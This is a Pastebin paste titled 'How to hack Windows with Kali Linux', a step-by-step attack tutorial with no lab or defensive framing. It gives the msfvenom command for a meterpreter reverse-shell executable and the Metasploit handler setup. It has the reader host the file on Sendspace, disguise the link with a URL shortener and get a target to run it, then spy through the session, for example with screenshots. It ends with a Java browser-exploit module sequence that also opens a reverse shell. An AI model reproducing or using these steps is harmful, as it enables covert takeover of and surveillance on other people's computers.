zurael_sTz

HOW TO HACK WINDOWS WITH KALI LINUX

Oct 19th, 2016
266
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. --------------------zurael sTz---------------------
  2. =================twitter=============================
  3. https://twitter.com/zurael_stz
  4. =====================================================
  5. =================facebook============================
  6. https://www.facebook.com/sTzisrael/
  7. =====================================================
  8. =================telegram============================
  9. https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
  10. =====================================================
  11.  
  12. HOW TO HACK WINDOWS WITH KALI LINUX
  13.  
  14. Step 1.
  15. First we need to get our local IP. Type:
  16.  
  17. Step : 1
  18. Code:
  19. ifconfig
  20.  
  21. You should see a IP address that looks something like this: 192.168.x.x or 10.x.x.x.x
  22.  
  23. Step : 2
  24. Now we need to make the executable that our target will open. Type:
  25. Code:
  26. msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR LOCAL IP> LPORT=4444 -f exe > /root/Desktop/qwerty.exe
  27.  
  28. This will put a file called qwerty.exe on your desktop.
  29.  
  30. Step 3.
  31. Now we are going to fire up metasploit! Type:
  32. Code:
  33. msfconsole
  34.  
  35. Wait for it to load...
  36.  
  37. Step 4.
  38. Now you need to type:
  39. Code:
  40. use multi/handler
  41.  
  42. Step 5.
  43. Now type:
  44. Code:
  45. set PAYLOAD windows/meterpreter/reverse_tcp
  46.  
  47. Step 6.
  48. For this you need to type these 2 commands seperate. Type:
  49. Code:
  50. set LHOST <YOUR LOCAL IP>
  51. Code:
  52. set LPORT 4444
  53.  
  54.  
  55. Step 7.
  56. Now we need to upload that qwerty.exe on your Desktop to Sendspace! Go to sendspace . com and drag and drop your file into "Drag files here" Then hit upload, now wait for it to upload and then click on qwerty.exe copy the link and go onto the next step!
  57.  
  58. Step 8.
  59. Go to the website goo . gl and paste the sendpace link in to "Your original URL here: " tick I am not a robot answer the verification and hit Shorten URL, It will give you a link similar to this > goo . gl / RVDcbq
  60.  
  61. Step 9.
  62. Type in the goo . gl link on your target computer hit the Download button and then type:
  63. Code:
  64. exploit
  65.  
  66. in Kali Linux, then open the program on your target computer and there you go you have hacked your target PC! Now move on to Step 10
  67.  
  68. Step 10.
  69. On Kali Linux type:
  70. Code:
  71. help
  72.  
  73. to see all the things you can do, as example if you want to screenshot their computer screen type screenshot. Look through "help" and see what you can find
  74.  
  75.  
  76.  
  77.  
  78. use exploit/multi/browser/java_jre17_jmxbean_2
  79. set srvhost [ip]
  80. set target 1
  81. set payload windows/meterpreter/reverse_tcp
  82. set lhost [ip]
  83. exploit
  84.  
  85. sessions -i 1
Add Comment
Please, Sign In to add comment